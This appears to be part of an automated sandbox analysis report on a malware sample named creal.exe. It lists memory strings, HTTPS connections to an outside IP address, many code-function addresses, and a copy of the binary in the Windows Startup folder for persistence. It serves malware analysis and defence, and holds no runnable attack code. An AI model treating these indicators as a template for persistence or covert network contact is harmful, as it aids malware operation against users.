            Source: creal.exe, 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506773484.00000185BBF19000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com)z
            Source: creal.exe, 00000002.00000003.1552936616.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1457557096.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1518240184.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1458778204.00000185BB83D000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1558249126.00000185BB844000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1531732077.00000185BB844000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1514920740.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1531272524.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1514358388.00000185BBE5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
            Source: creal.exe, 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://youtube.com)
            Source: creal.exe, 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506773484.00000185BBF19000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com)z
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
            Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
            Source: unknownHTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.9:49788 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.9:49801 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.9:49813 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.9:49911 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.9:49921 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.9:49934 version: TLS 1.2
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A6273BC0_2_00007FF67A6273BC
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A6264700_2_00007FF67A626470
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A6079600_2_00007FF67A607960
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A617F4C0_2_00007FF67A617F4C
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A6123A40_2_00007FF67A6123A4
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A6210380_2_00007FF67A621038
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A6243800_2_00007FF67A624380
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A611B840_2_00007FF67A611B84
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A61EC300_2_00007FF67A61EC30
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A613BE40_2_00007FF67A613BE4
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A61A5300_2_00007FF67A61A530
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A6121A00_2_00007FF67A6121A0
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A6119800_2_00007FF67A611980
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A611F940_2_00007FF67A611F94
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A601F500_2_00007FF67A601F50
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A6160300_2_00007FF67A616030
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A62481C0_2_00007FF67A62481C
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A6137E00_2_00007FF67A6137E0
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A621FE40_2_00007FF67A621FE4
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A6187D00_2_00007FF67A6187D0
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A617F4C0_2_00007FF67A617F4C
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A6210380_2_00007FF67A621038
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A61E11C0_2_00007FF67A61E11C
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A62A0F80_2_00007FF67A62A0F8
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A6090D00_2_00007FF67A6090D0
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A61E5B00_2_00007FF67A61E5B0
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A617D980_2_00007FF67A617D98
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A611D900_2_00007FF67A611D90
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A626E700_2_00007FF67A626E70
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A612E500_2_00007FF67A612E50
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A6266EC0_2_00007FF67A6266EC
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68D16302_2_00007FF8E68D1630
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E692B0602_2_00007FF8E692B060
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68C90602_2_00007FF8E68C9060
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6932BB02_2_00007FF8E6932BB0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68C9AB02_2_00007FF8E68C9AB0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68E07902_2_00007FF8E68E0790
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E69527A02_2_00007FF8E69527A0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68FF7D02_2_00007FF8E68FF7D0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68B47C02_2_00007FF8E68B47C0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68DD7C02_2_00007FF8E68DD7C0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68B77C42_2_00007FF8E68B77C4
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E69547502_2_00007FF8E6954750
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E69258A02_2_00007FF8E69258A0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E695E8E02_2_00007FF8E695E8E0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68CC8002_2_00007FF8E68CC800
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68B282E2_2_00007FF8E68B282E
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E695C8702_2_00007FF8E695C870
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68F45902_2_00007FF8E68F4590
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E69585B02_2_00007FF8E69585B0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E69225802_2_00007FF8E6922580
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E69535D02_2_00007FF8E69535D0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68B45102_2_00007FF8E68B4510
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E690B5302_2_00007FF8E690B530
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68DC5302_2_00007FF8E68DC530
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68C66F02_2_00007FF8E68C66F0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E69576C02_2_00007FF8E69576C0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68B96402_2_00007FF8E68B9640
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E69133B02_2_00007FF8E69133B0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E69543302_2_00007FF8E6954330
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68C34902_2_00007FF8E68C3490
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68B74B12_2_00007FF8E68B74B1
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E690A4902_2_00007FF8E690A490
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68DE4D02_2_00007FF8E68DE4D0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E69111D02_2_00007FF8E69111D0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E691A1102_2_00007FF8E691A110
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68B32952_2_00007FF8E68B3295
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E694A2802_2_00007FF8E694A280
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68D72D02_2_00007FF8E68D72D0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68D62F02_2_00007FF8E68D62F0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E690EFB02_2_00007FF8E690EFB0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68CBFA02_2_00007FF8E68CBFA0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6959FE02_2_00007FF8E6959FE0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68DCFE02_2_00007FF8E68DCFE0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68C7F602_2_00007FF8E68C7F60
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E69620B02_2_00007FF8E69620B0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68B40B02_2_00007FF8E68B40B0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E69710E02_2_00007FF8E69710E0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68F90102_2_00007FF8E68F9010
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68B70302_2_00007FF8E68B7030
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68C10602_2_00007FF8E68C1060
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6909D802_2_00007FF8E6909D80
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E694FD802_2_00007FF8E694FD80
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68BBDA02_2_00007FF8E68BBDA0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68FDDA02_2_00007FF8E68FDDA0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68CCDE02_2_00007FF8E68CCDE0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6945EF02_2_00007FF8E6945EF0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E691AE702_2_00007FF8E691AE70
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68EBB912_2_00007FF8E68EBB91
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68F3BA02_2_00007FF8E68F3BA0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68B3BC02_2_00007FF8E68B3BC0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6945B002_2_00007FF8E6945B00
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68F6B402_2_00007FF8E68F6B40
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68B9C802_2_00007FF8E68B9C80
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68D8CB02_2_00007FF8E68D8CB0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68BFC702_2_00007FF8E68BFC70
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E692099B2_2_00007FF8E692099B
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68FE9902_2_00007FF8E68FE990
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68D39802_2_00007FF8E68D3980
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68BA9402_2_00007FF8E68BA940
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68E59602_2_00007FF8E68E5960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6915A402_2_00007FF8E6915A40
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F01FD02_2_00007FF8E6F01FD0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F024302_2_00007FF8E6F02430
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F148202_2_00007FF8E6F14820
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F145D02_2_00007FF8E6F145D0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F21D802_2_00007FF8E6F21D80
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F224A02_2_00007FF8E6F224A0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F229C02_2_00007FF8E6F229C0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F22EC02_2_00007FF8E6F22EC0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F235502_2_00007FF8E6F23550
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F21FF02_2_00007FF8E6F21FF0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F321102_2_00007FF8E6F32110
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F31D402_2_00007FF8E6F31D40
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F41F102_2_00007FF8E6F41F10
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F421C02_2_00007FF8E6F421C0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F61FA02_2_00007FF8E6F61FA0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F71F402_2_00007FF8E6F71F40
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F720502_2_00007FF8E6F72050
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F81D402_2_00007FF8E6F81D40
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F822D02_2_00007FF8E6F822D0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F921602_2_00007FF8E6F92160
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6FA20702_2_00007FF8E6FA2070
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6FC22202_2_00007FF8E6FC2220
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7007C382_2_00007FF8E7007C38
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E70218A02_2_00007FF8E70218A0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E70212F02_2_00007FF8E70212F0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E714C4802_2_00007FF8E714C480
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71509802_2_00007FF8E7150980
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71710002_2_00007FF8E7171000
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71712B02_2_00007FF8E71712B0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71718E02_2_00007FF8E71718E0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7197BF02_2_00007FF8E7197BF0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7197FC92_2_00007FF8E7197FC9
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7215DC02_2_00007FF8E7215DC0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D1B542_2_00007FF8E71D1B54
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D11722_2_00007FF8E71D1172
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E724A7402_2_00007FF8E724A740
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D1D982_2_00007FF8E71D1D98
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D1EE72_2_00007FF8E71D1EE7
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71F62902_2_00007FF8E71F6290
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D1AD72_2_00007FF8E71D1AD7
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D27162_2_00007FF8E71D2716
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3D0647026_2_00007FF7C3D06470
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3D073BC26_2_00007FF7C3D073BC
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CE796026_2_00007FF7C3CE7960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CF7F4C26_2_00007FF7C3CF7F4C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CFEC3026_2_00007FF7C3CFEC30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CF3BE426_2_00007FF7C3CF3BE4
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CF23A426_2_00007FF7C3CF23A4
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3D0103826_2_00007FF7C3D01038
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CF1B8426_2_00007FF7C3CF1B84
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3D0438026_2_00007FF7C3D04380
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CF21A026_2_00007FF7C3CF21A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CF198026_2_00007FF7C3CF1980
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CFE11C26_2_00007FF7C3CFE11C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3D0A0F826_2_00007FF7C3D0A0F8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CE90D026_2_00007FF7C3CE90D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CF7F4C26_2_00007FF7C3CF7F4C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CF603026_2_00007FF7C3CF6030
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3D0481C26_2_00007FF7C3D0481C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3D0103826_2_00007FF7C3D01038
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3D01FE426_2_00007FF7C3D01FE4
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CF37E026_2_00007FF7C3CF37E0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CF87D026_2_00007FF7C3CF87D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CF1F9426_2_00007FF7C3CF1F94
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CE1F5026_2_00007FF7C3CE1F50
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3D066EC26_2_00007FF7C3D066EC
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3D06E7026_2_00007FF7C3D06E70
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CF2E5026_2_00007FF7C3CF2E50
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CFE5B026_2_00007FF7C3CFE5B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CF7D9826_2_00007FF7C3CF7D98
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CF1D9026_2_00007FF7C3CF1D90
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CFA53026_2_00007FF7C3CFA530
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E599163028_2_00007FF8E5991630
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E598906028_2_00007FF8E5989060
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5989AB028_2_00007FF8E5989AB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59F2BB028_2_00007FF8E59F2BB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59866F028_2_00007FF8E59866F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5A176C028_2_00007FF8E5A176C0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E597964028_2_00007FF8E5979640
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5A185B028_2_00007FF8E5A185B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59E258028_2_00007FF8E59E2580
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59B459028_2_00007FF8E59B4590
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5A135D028_2_00007FF8E5A135D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E599C53028_2_00007FF8E599C530
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59CB53028_2_00007FF8E59CB530
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E597451028_2_00007FF8E5974510
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59E58A028_2_00007FF8E59E58A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5A1E8E028_2_00007FF8E5A1E8E0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E597282E28_2_00007FF8E597282E
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E598C80028_2_00007FF8E598C800
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5A1C87028_2_00007FF8E5A1C870
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5A127A028_2_00007FF8E5A127A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59A079028_2_00007FF8E59A0790
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E599D7C028_2_00007FF8E599D7C0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59777C428_2_00007FF8E59777C4
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59747C028_2_00007FF8E59747C0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59BF7D028_2_00007FF8E59BF7D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E5A1475028_2_00007FF8E5A14750
